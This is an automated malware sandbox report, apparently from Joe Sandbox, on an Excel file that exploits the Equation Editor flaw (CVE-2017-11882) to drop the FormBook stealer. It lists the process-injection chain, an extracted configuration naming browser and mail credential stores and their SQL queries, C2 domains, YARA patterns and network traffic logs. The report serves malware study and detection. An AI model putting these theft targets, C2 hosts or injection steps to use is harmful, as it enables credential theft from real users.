Loading ...

Play interactive tourEdit tour

Analysis Report NEW 01 13 2021.xlsx

Overview

General Information

Sample Name:NEW 01 13 2021.xlsx
Analysis ID:339199
MD5:9aa0898ded04a2ee18d7b0074413ac94
SHA1:59c525a0dd116c9f7ec4b5773a7131ef49a29ad9
SHA256:d6823f8eaf8a072000df7cc5811f35e58f63182657c67f7d99874d7f534851e8
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2396 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2512 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2812 cmdline: 'C:\Users\Public\vbc.exe' MD5: 6A763ED09B2FD9F663BCB0AF7B17D492)
      • vbc.exe (PID: 2732 cmdline: C:\Users\Public\vbc.exe MD5: 6A763ED09B2FD9F663BCB0AF7B17D492)
      • vbc.exe (PID: 2752 cmdline: C:\Users\Public\vbc.exe MD5: 6A763ED09B2FD9F663BCB0AF7B17D492)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • chkdsk.exe (PID: 1772 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: A01E18A156825557A24A643A2547AA8C)
            • cmd.exe (PID: 1840 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79d9", "KEY1_OFFSET 0x1bae5", "CONFIG SIZE : 0xaf", "CONFIG OFFSET 0x1bbe5", "URL SIZE : 21", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x175102a1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012168", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015c9", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "fundamentaliemef.com", "gallerybrows.com", "leadeligey.com", "octoberx2.online", "climaxnovels.com", "gdsjgf.com", "curateherstories.com", "blacksailus.com", "yjpps.com", "gmobilet.com", "fcoins.club", "foreverlive2027.com", "healthyfifties.com", "wmarquezy.com", "housebulb.com", "thebabyfriendly.com", "primajayaintiperkasa.com", "learnplaychess.com", "chrisbubser.digital", "xn--avenr-wsa.com", "exlineinsurance.com", "thrivezi.com", "tuvandadayvitos24h.online", "illfingers.com", "usmedicarenow.com", "pandabutik.com", "engageautism.info", "magnabeautystyle.com", "texasdryroof.com", "woodlandpizzahartford.com", "dameadamea.com", "sedaskincare.com", "ruaysatu99.com", "mybestaide.com", "nikolaichan.com", "mrcabinetkitchenandbath.com", "ondemandbarbering.com", "activagebenefits.net", "srcsvcs.com", "cbrealvitalize.com", "ismaelworks.com", "medkomp.online", "ninasangtani.com", "h2oturkiye.com", "kolamart.com", "acdfr.com", "twistedtailgatesweeps1.com", "ramjamdee.com", "thedancehalo.com", "joeisono.com", "glasshouseroadtrip.com", "okcpp.com", "riggsfarmfenceservices.com", "mgg360.com", "xn--oi2b190cymc.com", "ctfocbdwholesale.com", "openspiers.com", "rumblingrambles.com", "thepoetrictedstudio.com", "magiclabs.media", "wellnesssensation.com", "lakegastonautoparts.com", "dealsonwheeeles.com", "semenboostplus.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.rizrvd.com/bw82/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        6.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2512, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2812
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 18.195.87.136, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2512, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2512, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2512, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2812
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2512, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2812
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2512, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2812

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 6.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79d9", "KEY1_OFFSET 0x1bae5", "CONFIG SIZE : 0xaf", "CONFIG OFFSET 0x1bbe5", "URL SIZE : 21", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x175102a1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012168", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015c9", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
          Multi AV Scanner detection for submitted fileShow sources
          Source: NEW 01 13 2021.xlsxVirustotal: Detection: 29%Perma Link
          Source: NEW 01 13 2021.xlsxReversingLabs: Detection: 22%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exeJoe Sandbox ML: detected
          Source: 6.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: chkdsk.pdb source: vbc.exe, 00000006.00000002.2220300365.000000000047D000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, chkdsk.exe
          Source: global trafficDNS query: name: www.yjpps.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 18.195.87.136:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 18.195.87.136:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 18.195.87.136:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 54.254.26.94:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 54.254.26.94:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 54.254.26.94:80
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Jan 2021 16:17:28 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 13 Jan 2021 09:32:43 GMTETag: "ce400-5b8c4d239f0b9"Accept-Ranges: bytesContent-Length: 844800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 63 bd fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 da 0c 00 00 08 00 00 00 00 00 00 ce f8 0c 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 f8 0c 00 4b 00 00 00 00 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 d8 0c 00 00 20 00 00 00 da 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 0d 00 00 06 00 00 00 dc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 e2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 